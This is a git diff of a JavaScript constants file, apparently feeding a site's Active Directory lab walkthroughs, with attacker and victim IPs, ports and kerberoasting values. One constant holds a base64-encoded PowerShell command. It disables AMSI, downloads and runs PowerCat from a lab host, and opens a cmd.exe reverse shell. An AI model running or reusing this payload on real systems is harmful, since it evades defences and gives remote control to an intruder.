@@ -6,17 +6,13 @@ export const REPO_NAME = ""; // for future expansion use
66export const T_ANI_GIF_URL = `${ LOGO_PATH } /tkokhing.gif` ;
77export const TKOKHING_LOGO_SVG_URL = `${ LOGO_PATH } /tkokhing.svg` ;
88
9- // For all sites
10- export const VICTIM1_IP = "172.17.0.5" ;
11- export const VICTIM1_PORT = "8080" ;
12- export const ATTACKER_IP = "192.168.137.19" ;
13- export const ATTACKER_PORT = "4444" ;
9+
1410
1511// AD Setup
1612
1713// export const MS01_IP_EXT = "192.168.118.173";
1814// export const MS01_IP_INT = "172.16.242.173";
19- // export const MS01_PORT_FORWARD = "4444";
15+ // export const MS01_FORWARD_PORT_2 = "4444";
2016
2117// // // for kerberoasted service
2218// export const RUNNING_SPN = "svc-auth";
@@ -31,19 +27,43 @@ export const ATTACKER_PORT = "4444";
3127// export const DC01_IP = "172.16.242.162";
3228// export const DC01_PORT_FORWARD = "4442";
3329
34- export const MS01_IP_EXT = "192.168.118.173" ;
35- export const MS01_IP_INT = "172.16.242.173" ;
36- export const MS01_PORT_FORWARD = "4444" ;
3730
38- // // for kerberoasted service
39- export const RUNNING_SPN = "svc-auth " ;
31+ export const ATTACKER_IP = "192.168.118.10" ;
32+ export const ATTACKER_PORT = "4444 " ;
4033
41- // // EncodedText for SCSHELL
42- export const EncodedText = "encoded_text_for_scshell"
34+ // // Client01 (aka MS01) Browser Viewing
35+ // // - Internal (172.16.242.173)
36+ export const MS01_IP_EXT = "192.168.118.173" ;
37+ export const MS01_IP_INT = "172.16.242.173" ;
38+ export const MS01_FORWARD_PORT_1 = "80" ; // To download <u>PowerCat</u>
39+ export const MS01_FORWARD_PORT_2 = "4444" ; // To open <u>reverse shell</u>
4340
4441
42+ // // WEB01 (aka MS02) Terminal
43+ // // - Internal (172.16.242.176)
4544export const MS02_IP_INT = "172.16.242.176" ;
4645export const MS02_PORT_FORWARD = "4443" ;
4746
47+
4848export const DC01_IP = "172.16.242.162" ;
4949export const DC01_PORT_FORWARD = "4442" ;
50+
51+ export const AD_ATTACKER_IP = ATTACKER_IP ;
52+ export const AD_ATTACKER_LISTEN_PORT_1 = "80" ; // To facilitate pulling of <u>PowerCat</u>
53+ export const AD_ATTACKER_LISTEN_PORT_2 = "443" ; // To facilitate incoming <u>reverse shell</u>
54+
55+
56+ // // for kerberoasted service
57+ export const RUNNING_SPN = "svc-auth" ;
58+ export const RUNNING_SPN_HASH = "hashhashashashverylong" ;
59+ export const RUNNING_SPN_PASSWORD = "pas$word" ;
60+
61+
62+ // // EncodedText for SCSHELL
63+ // // // // export const EncodedText = "please_update_encoded_text_for_scshell"
64+ export const EncodedText = "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuACIAKwAkACgAIgA0ADEAIAA2AEQAIAA3ADMAIAA2ADkAIAA1ADUAIAA3ADQAIAA2ADkAIAA2AEMAIAA3ADMAIgAuAFMAcABsAGkAdAAoACIAIAAiACkAfABmAG8AcgBFAGEAYwBoAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAdABvAGkAbgB0ADEANgAoACQAXwAsADEANgApACkAfQB8AGYAbwByAEUAYQBjAGgAewAkAHIAZQBzAHUAbAB0AD0AJAByAGUAcwB1AGwAdAArACQAXwB9ADsAJAByAGUAcwB1AGwAdAApACkALgBHAGUAdABGAGkAZQBsAGQAKAAkACgAIgA2ADEAIAA2AEQAIAA3ADMAIAA2ADkAIAA0ADkAIAA2AEUAIAA2ADkAIAA3ADQAIAA0ADYAIAA2ADEAIAA2ADkAIAA2AEMAIAA2ADUAIAA2ADQAIgAuAFMAcABsAGkAdAAoACIAIAAiACkAfABmAG8AcgBFAGEAYwBoAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAdABvAGkAbgB0ADEANgAoACQAXwAsADEANgApACkAfQB8AGYAbwByAEUAYQBjAGgAewAkAHIAZQBzAHUAbAB0ADIAPQAkAHIAZQBzAHUAbAB0ADIAKwAkAF8AfQA7ACQAcgBlAHMAdQBsAHQAMgApACwAIgBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAIABpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4AMgA0ADIALgAxADcAMwAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACIAKQA7ACAAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA3ADIALgAxADYALgAyADQAMgAuADEANwAzACAALQBwACAANAA0ADQANAAgAC0AZQAgAGMAbQBkAC4AZQB4AGUA"
65+
66+
67+ // For all sites VICTIM TAGGING
68+ export const VICTIM1_IP = MS01_IP_EXT ;
69+ export const VICTIM1_PORT = MS01_FORWARD_PORT_2 ;
0 commit comments